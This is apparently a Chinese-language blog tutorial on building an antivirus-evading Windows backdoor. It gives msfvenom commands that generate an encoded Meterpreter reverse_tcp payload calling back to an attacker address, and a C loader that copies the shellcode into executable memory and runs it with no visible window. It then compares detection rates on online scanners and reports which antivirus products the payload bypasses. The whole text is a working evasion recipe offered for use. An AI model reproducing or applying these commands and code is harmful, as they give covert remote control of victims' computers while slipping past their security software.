环境:
kali-linux-2018.
Visual Studio 2017
msfvenom
更新时间:2018年8月13日07:06:43
直接注入的生成方式(一):
-
//生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码
-
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.113 LPORT=55555 -f exe >
输出c格式的方式(二):
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=192.168.1.113 LPORT=55555 -f c
使用VS2017,将生成的c代码复制到shellcode is here
-
#include ""
-
#include ""
-
#include ""
-
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//运行时不显示窗口
-
unsigned char shellcode[] =
-
"shellcode is here";
-
-
-
void main()
-
{
-
LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-
memcpy(Memory, shellcode, sizeof(shellcode));
-
((void(*)())Memory)();
-
}
-
修改一下项目属性,最后生成exe程序
使用在线杀软引擎测试普通生成和c编译的免杀率对比
方式一:
最低百分五十:
几乎百分百:
方式二:
大概六分之一几率:
其中主流杀软如360等免杀成功:
根据测试数据,那么第一种方式最低百分之五十会被杀软检测到,最高百分之九十以上。
第二种几率降低了很多,虽说TX,360都过了,但是这并不是我想要的,,
因为我的火绒在电脑上几乎百分百拦截。
记录每一次测试,如果有大佬会的烦请留下提点一二,谢谢。